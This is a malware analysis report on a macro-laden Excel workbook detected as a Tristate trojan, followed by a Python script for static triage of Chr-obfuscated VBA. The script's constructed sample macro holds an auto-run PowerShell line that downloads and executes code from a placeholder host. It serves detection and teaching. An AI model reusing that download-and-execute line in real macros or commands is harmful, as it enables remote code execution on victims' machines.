Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 eb120a7004b7017a…

MALICIOUS

Office (OLE)

Size: 31.5 KB
Created: 1999-11-09 08:26:52
Authoring application: Microsoft Excel
MD5: 04b97db45edf9579aaa0cef3e3a47df7
SHA-1: c9e58481a8d4f4ff0da8090e703ea66d547fdb45
SHA-256: eb120a7004b7017a235e83b70ebc9885f2fda3222112763d222df73ad2802d19
Risk Score: 260

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1059.001 Command and Scripting Interpreter: PowerShell
  • T1204.002 User Execution: Malicious File

The file is an Excel workbook containing VBA macros, as indicated by the OLE_VBA_MACROS, OLE_VBA_CREATEOBJ and OLE_VBA_GETOBJ heuristics. ClamAV identifies the workbook as Win.Trojan.Tristate-2 and the carved macro source as Doc.Trojan.Tristate-1. The document body contains financial-planning text, consistent with a lure intended to get the user to enable macros. The decoded VBA source (macros.bas) was carved, but its strings are assembled at run time from Chr/ChrW calls and the final payload was not reconstructed; the auto-exec entry point, the CreateObject/GetObject calls and the execution/download terms in the macro strongly suggest that malicious code runs as soon as macros are enabled. The 1999 creation timestamp is taken from the OLE metadata streams, which the author controls, so it says nothing reliable about when the sample was actually built.

Heuristics (6)

  • ClamAV: Win.Trojan.Tristate-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Tristate-2
  • ClamAV detection on extracted artifact critical EXTRACTED_FILE_CLAMAV
    ClamAV flagged at least one file extracted from inside this sample. Even when the wrapping document carries no AV detection of its own, a hit on the carved artifact is a strong indicator the sample is a delivery vehicle.
  • CreateObject call high OLE_VBA_CREATEOBJ
    The macro instantiates a COM object by ProgID. In macro malware this is the usual route to WScript.Shell, Shell.Application or MSXML2.XMLHTTP for command execution and downloads; the ProgID string is often built from Chr() calls so that it never appears in clear text.
  • GetObject call high OLE_VBA_GETOBJ
    The macro obtains a COM object through GetObject, which takes a moniker string and can return a running or newly created object without calling CreateObject. It serves the same purpose and is sometimes chosen to slip past rules that only look for CreateObject.
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
SHA-256: ab6d1cf8ac5d295463a7a0554c30b621ce12536980700faa5357edd9c34b657a
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9805 bytes
Detection: ClamAV: Doc.Trojan.Tristate-1
Obfuscation or payload: likely
  Carved artifact contains 12 Chr/ChrW string-construction calls. Carved macro source contains an auto-exec entry point and execution/download terms.
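As an added example (not the analysis platform's code, and not the carved macros.bas from this report), the Python below performs the same kind of static triage that produced the "Obfuscation or payload" verdict above: it counts Chr/ChrW calls, replaces each with the character it yields and folds the `&` concatenations so the run-time strings become visible, then looks for an auto-exec entry point, CreateObject/GetObject calls and execution/download terms. The macro text in SAMPLE_VBA is constructed for illustration, and the regexes, function names and term list are this example's own assumptions rather than olevba's implementation.

```python
"""Static triage of a VBA macro: decode Chr/ChrW string construction, then
report the features the heuristics above fire on (auto-exec entry point,
CreateObject/GetObject, execution/download terms).

Added example; not the analysis platform's code and not the carved macros.bas.
"""
import re

# Constructed sample macro, assumed to resemble what olevba would decode.
# It is NOT the macros.bas artifact from the report.
SAMPLE_VBA = '''Attribute VB_Name = "ThisWorkbook"
Private Sub Workbook_Open()
    Dim o As Object
    Dim c As String
    Set o = CreateObject(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & "." & Chr(83) & "hell")
    c = ChrW(112) & ChrW(111) & "wershell -nop -w hidden -c " & Chr(34) & "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')" & Chr(34)
    o.Run c, 0
End Sub
'''

# Chr(n), Chr$(n) and ChrW(n): one character from a numeric code.
CHR_CALL = re.compile(r'\bChr[W$]?\s*\(\s*(\d+)\s*\)', re.IGNORECASE)
# Two VBA string literals joined by &; "" inside a literal is an escaped quote.
MERGE = re.compile(r'"((?:[^"]|"")*)"\s*&\s*"((?:[^"]|"")*)"')
STR_LIT = re.compile(r'"((?:[^"]|"")*)"')
# Procedure names Office runs automatically when the document is opened/closed.
AUTOEXEC = re.compile(
    r'\b(?:Sub|Function)\s+(Auto_?Open|Auto_?Close|Auto_?Exec|AutoNew|'
    r'Workbook_Open|Workbook_Activate|Document_Open|Document_Close)\b',
    re.IGNORECASE)
OBJ_CALL = re.compile(r'\b(CreateObject|GetObject)\s*\(', re.IGNORECASE)
# Lowercase substrings that indicate command execution or downloading (assumed list).
EXEC_DOWNLOAD_TERMS = (
    "powershell", "wscript.shell", "shell.application", "cmd.exe", ".run ",
    "downloadstring", "downloadfile", "urldownloadtofile", "xmlhttp",
    "invoke-expression", "iex ",
)


def decode_chr_strings(src: str) -> str:
    """Replace Chr/ChrW calls with string literals and fold & concatenations.

    Kept deliberately simple: quotes inside VBA comments and " _" line
    continuations are not handled, and only numeric Chr arguments are decoded,
    so Chr(Asc(...))-style tricks are left untouched.
    """
    def one_char(m: re.Match) -> str:
        n = int(m.group(1))
        ch = chr(n) if n <= 0x10FFFF else "?"
        return '"' + ch.replace('"', '""') + '"'   # 34 -> "" inside a literal

    out = CHR_CALL.sub(one_char, src)
    while True:                      # each pass removes at least one &
        folded = MERGE.sub(r'"\1\2"', out)
        if folded == out:
            return out
        out = folded


def string_literals(src: str) -> list:
    """Every string literal in src, with "" unescaped to a single quote."""
    return [m.group(1).replace('""', '"') for m in STR_LIT.finditer(src)]


def triage(src: str) -> dict:
    """Static features of a macro, in the spirit of the report's heuristics."""
    decoded = decode_chr_strings(src)
    low = decoded.lower()
    return {
        "chr_calls": len(CHR_CALL.findall(src)),
        "autoexec": sorted({m.group(1) for m in AUTOEXEC.finditer(src)}),
        "object_creation": sorted({m.group(1) for m in OBJ_CALL.finditer(src)}),
        "strings": string_literals(decoded),
        "exec_download_terms": [t for t in EXEC_DOWNLOAD_TERMS if t in low],
        "decoded_source": decoded,
    }


if __name__ == "__main__":
    result = triage(SAMPLE_VBA)
    for key in ("chr_calls", "autoexec", "object_creation", "exec_download_terms"):
        print(f"{key}: {result[key]}")
    print("recovered strings:")
    for s in result["strings"]:
        print("  ", s)
```

On the constructed sample the decoder turns the Chr-built ProgID back into `CreateObject("WScript.Shell")` and exposes the full command line, which is exactly the information that a count of Chr calls alone does not give. To run it on a real carved artifact, replace SAMPLE_VBA with the contents of the decoded VBA source; if the recovered strings still look like noise, the macro is using a layer the decoder does not handle (StrReverse, Base64, arithmetic on character codes), and that is itself a finding worth recording.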